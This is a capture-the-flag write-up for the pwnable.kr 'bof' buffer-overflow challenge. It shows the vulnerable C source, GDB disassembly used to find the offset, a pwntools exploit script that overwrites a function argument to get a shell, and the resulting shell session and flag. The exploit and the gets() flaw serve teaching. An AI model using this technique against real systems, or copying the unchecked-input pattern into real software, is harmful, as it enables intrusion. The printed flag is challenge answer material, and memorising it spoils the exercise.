Pwnable.kr - bof
Challenge description:
Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
This is a classic buffer overflow challenge, the code reads user input and stores it in a 32 bytes array using gets() which doesn’t do any size checking.
So if we enter say a hundred characters we will overflow the buffer array overflowme and write past it in memory.
The goal of this challenge is to overwrite key with the value 0xcafebabe, by default function arguments are stored at ebp+8, ebp+c, ..., there is only on argument so we now it’s at ebp+8 (note that in 64 bit systems, function arguments are stored in the registers).
Using GDB, we can disassemble func to know the exact offset of the input buffer array from the key argument.
gef➤ disassemble func
Dump of assembler code for function func:
.....
0x56555644 <+24>: call 0xf7e2db70 <puts>
=> 0x56555649 <+29>: lea eax,[ebp-0x2c]
0x5655564c <+32>: mov DWORD PTR [esp],eax
0x5655564f <+35>: call 0xf7e2d0c0 <gets>
=> 0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
.....
Great, now we now the buffer is at offset 0x2c from ebp, so we need to send:
[0x2c characters to reach ebp + 4 bytes for saved ebp + 4 bytes for the return address + the value 0xcafebabe].
Solution:
#solve.py
from pwn import *
p = remote('pwnable.kr', 9000)
buf = ""
buf += 'A' * 0x2c
buf += 'XXXX' # saved ebp
buf += 'XXXX' # ret address
buf += p32(0xcafebabe) # value to overwrite key
p.send(buf)
p.interactive() # for interactive shell
$ python2 solve.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
Flag: daddy, I just pwned a buFFer :)